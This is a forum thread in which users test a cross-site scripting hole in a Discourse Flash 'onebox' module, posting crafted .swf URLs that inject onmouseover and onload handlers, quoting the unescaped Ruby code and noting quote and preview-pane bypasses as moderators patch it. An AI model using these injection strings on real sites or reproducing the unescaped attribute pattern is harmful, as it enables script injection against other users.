HTML tag abuse thread
-
http://google.com/test'onmouseover=alert('XSS!');//.swf
http://google.com/test'onload=alert('XSS!');//.swf
[Edit - PJH] Rebaking to test a9342db
-
I'll be damned, the first one works.
-
http://google.com/test'onmouseover=alert('XSS!');//.swf
http://google.com/test'onload=alert('XSS!');//.swf
Nice!
[Edit - PJH] Rebaking
-
Oh crap!
-
http://google.com/test'onmouseover=alert('XSS!');//.swf
http://google.com/test'onload=alert('XSS!');//.swf
@PJH, we have a winner!
[Edit - PJH] Rebaking
-
-
-
http://google.com/test'onmouseover=document.location.href='http://google.com';//.swf
[Edit - PJH] Rebaking
-
This is a terrible exploit.
-
That's just evil.
-
<code class="fa-spin">foobar
-
-
Feature request: Logo change for the forums. Should read:
The Daily WTF Forums
We break shit
Filed under: Add Unicode abuse where appropriate, I'm too lazy
-
-
-
My link and its title isn't quite right
I don't know how this could be exploited, but it's obviously wrong:
<a href="http://thedailywtf.com" title="@breaks shit">My link isn't quite right</a>
-
http://google.com/test'onmouseover=alert('XSS!');//.swf
Seriously though... that's full of fail, I can't believe it took that long for someone to figure that one out!
Interestingly it fails to work on links that would one-box...
http://en.wikipedia.org/wiki/Noah_Lomax'onmouseover='alert('soyoumanagedtofixonevarietybutnotall,congratsdicsourse');//.swf
[Edit - PJH] Rebaking
-
module Onebox
  module Engine
    class FlashVideoOnebox
      include Engine

      matches_regexp /^https?:\/\/.*\.(swf|flv)$/

      def to_html
        if SiteSetting.enable_flash_video_onebox
          "<object width='100%' height='100%'><param name='#{@url}' value='#{@url}'><embed src='#{@url}' width='100%' height='100%'></embed></object>"
        else
          "<a href='#{@url}'>#{@url}</a>"
        end
      end
    end
  end
end
Well, that is full of fail.
-
Yeah... they double quote all their links everywhere and then someone gets too lazy to escape that one module and leaves escapable single quotes in the href... witch hunt on the person that checked that file in.
-
Note to Dicsourse editors - grep for href=' in your project files and fix them all before someone else greps it.
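The quoting problem discussed in the posts above, as an added example that is not part of the thread or of the project's code: the fallback link built with raw interpolation beside an escaped version, plus a source scan in the spirit of the grep advice. The function names are hypothetical, `attribute_names` is a simplified stand-in for a browser's tag parser, and `ERB::Util.html_escape` is an assumed choice of escaping routine, not necessarily what the actual fix used.

```ruby
require 'erb'

# Pattern from the module quoted above: any http(s) URL ending in .swf or .flv.
FLASH_URL = /^https?:\/\/.*\.(swf|flv)$/

# "Before": raw interpolation into a single-quoted attribute, as in the
# fallback branch of the quoted module.
def link_unescaped(url)
  "<a href='#{url}'>#{url}</a>"
end

# "After": HTML-escape the value first. ERB::Util.html_escape encodes ' as
# &#39; (plus " & < >), so the value cannot close the attribute.
def link_escaped(url)
  safe = ERB::Util.html_escape(url)
  "<a href='#{safe}'>#{safe}</a>"
end

# Simplified model (assumption, not a full HTML parser) of how a browser
# splits the opening <a> tag into attributes; returns the attribute names.
def attribute_names(html)
  tag = html[/\A<a\b([^>]*)>/, 1].to_s
  tag.scan(/([\w-]+)\s*=\s*(?:'[^']*'|"[^"]*"|[^\s>]+)/).flatten
end

# Audit helper for the "grep for href='" advice: attributes in template
# source whose single-quoted value is a bare #{...} interpolation.
def raw_interpolated_attrs(source)
  source.scan(/([\w-]+)='\#\{[^}]+\}'/).flatten
end

# Constructed inputs: a URL posted in this thread and two strings from the module.
PAYLOAD = "http://google.com/test'onmouseover=alert('XSS!');//.swf"
SAMPLE_SOURCE = <<~'SRC'
  "<embed src='#{@url}' width='100%' height='100%'></embed>"
  "<a href='#{@url}'>#{@url}</a>"
SRC

if __FILE__ == $PROGRAM_NAME
  puts "matches onebox regexp: #{FLASH_URL.match?(PAYLOAD)}"
  puts "unescaped attributes:  #{attribute_names(link_unescaped(PAYLOAD)).inspect}"
  puts "escaped attributes:    #{attribute_names(link_escaped(PAYLOAD)).inspect}"
  puts "raw interpolations:    #{raw_interpolated_attrs(SAMPLE_SOURCE).inspect}"
end
```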
-
I wonder...
Awesome, this one spins in my profile too.
-
-
I wonder...
Can you make it big, spinning and have it respond to mouseover?
-
Glad I could be of service.
-
http://google.com/test'class='fa-spin'onmouseover=this.classList.add('fa-5x')//.swf
Come on, mouse it over.
[Edit - PJH] Rebaking
-
This post is deleted!
-
I can't, mobile!
Edit holy shit this topic is making my screen hot now
-
Macie took my idea and stole my badge T_T
-
Anybody have time to JavaScript uppercase the entire thread...page.... xss?
-
Unless I'm missing something, it seems to have been fixed...
http://example.org/tes't'abc.swf
-
Anybody have time to JavaScript uppercase the entire thread...page.... xss?
It's tough to do anything too complex because the 2nd open parenthesis triggers it to cut off your script.
-
, it seems to have been fixed.
Nevermind - it's fixed once you post. The preview window is still jacked, but I guess who cares if you XSS yourself.
http://www.google.com/'onmouseover=alert('test');//.swf
(although if you reply all and then hover my script it may work in your preview window I guess)
-
Nevermind - it's fixed once you post. The preview window is still jacked, but I guess who cares if you XSS yourself.
http://www.google.com/'onmouseover=alert('test');//.swf
(although if you reply all and then hover my script it may work in your preview window I guess)
Yep - you can XSS bomb still if someone reply quotes and hovers the preview.
-
Son of a bitch, I just got to work and I was going to make a javascript file uploader for filenotfoundstorage.com =(
(Well, more accurately, just the file upload window prompt)
-
http://what.thedailywtf.com/t/html-tag-abuse-thread/1269/210?u=matches
This quoted post still works (for now)
[Edit]
@PJH
Quoting the quoted post ALSO pops the xss. Sexy.
(Click the down arrow and mouse over)
-
-
Maybe not, but you have letter soup and I was on mobile.
-
Nice!
I wonder...
lol - the xss to pop a javascript alert still works, but the fa-spin doesn't. What happens if I quote a quote...
-
Can you make it big, spinning and have it respond to mouseover?
Dah...?
Dah.
Quoting a quote preserves the issue, direct quoting doesn't
-
There may be some cache issue, but I can't get it to work even in the preview pane. I tried quoting someone but @PJH is rebaking posts faster than I can quote them.
-
but @PJH is rebaking posts faster than I can quote them.
he's one hell of a chef, that's for sure.
-- yeah, if you reload your page, or just got here, the preview pane XSS is fixed now too.
-
It still spins :D
-
I haven't seen any spinning on anything, even when the exploit was still unfixed. I am grumpy cat.
-
http://what.thedailywtf.com/t/html-tag-abuse-thread/1269/246?u=matches
Click the up arrow, then the down arrow
-
Click the up arrow, then the down arrow
I clicked as prescribed, no worky.
I've hovered every single thing in this topic, never got a spinner.
-
However, if you click spam the Up/Down arrow on Quotes, you can get this:
Sweet, huh?
-
You're a blind man. When you click the up arrow it will jump you to my quote with Keith, then click the down arrow to expand Keith's quote of Macie jumble of letters which has a spinner.
Your browser may not support spins.
-
You're a blind man. When you click the up arrow it will jump you to my quote with Keith, then click the down arrow to expand Keith's quote of Macie jumble of letters which has a spinner.
I did exactly what you described and none of it spins. Zero Spin.
My browser does support spins because the fa-spin topic spun it up hardcore. It's just not working for this particular spin for whatever reason.
See screenshot above, which is what you wanted me to do, right? Ignore the part where I got agitated and click spammed the up/down buttons to jack up the quote nesting.
-
My browser does support spins because the fa-spin topic spun it up hardcore. It's just not working for this particular spin for whatever reason.
Which browser are you using, and have you tried a different one?
-
Very interesting, because it even lists it in the CSS inspector:
.fa-spin {
-webkit-animation: spin 5s infinite linear;
-moz-animation: spin 2s infinite linear;
-o-animation: spin 2s infinite linear;
}
and the -webkit one is checked as if it should work.
This is on chrome 33.
Nevermind, it supports it fine.... screenshot coming.
I had to manually alter the css to make it work though.